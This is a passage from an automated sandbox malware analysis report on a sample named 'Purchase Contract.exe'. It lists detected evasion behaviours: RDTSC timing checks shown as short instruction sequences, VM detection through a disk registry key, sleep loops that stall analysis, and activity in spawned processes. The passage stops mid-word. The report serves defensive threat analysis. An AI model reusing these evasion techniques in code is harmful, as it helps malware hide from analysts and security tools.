Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeRDTSC instruction interceptor: First address: 0000000005377244 second address: 000000000537724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Contract.exeRDTSC instruction interceptor: First address: 00000000053774AE second address: 00000000053774B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002967244 second address: 000000000296724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000029674AE second address: 00000000029674B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeRDTSC instruction interceptor: First address: 00000000057C7244 second address: 00000000057C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeRDTSC instruction interceptor: First address: 00000000057C74AE second address: 00000000057C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeRDTSC instruction interceptor: First address: 00000000049A7244 second address: 00000000049A724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeRDTSC instruction interceptor: First address: 00000000049A74AE second address: 00000000049A74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C27244 second address: 0000000000C2724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C274AE second address: 0000000000C274B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C7244 second address: 00000000007C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C74AE second address: 00000000007C74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machinesShow sources
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E25595 rdtsc 0_2_05E25595
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeAPI coverage: 2.3 %
Source: C:\Windows\SysWOW64\control.exeAPI coverage: 4.8 %
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeAPI coverage: 2.4 %
Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 2.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exe TID: 5016Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2884Thread sleep time: -68000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 1820Thread sleep count: 61 > 30Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 1820Thread sleep time: -305000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe TID: 4508Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe TID: 4812Thread sleep time: -30000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May t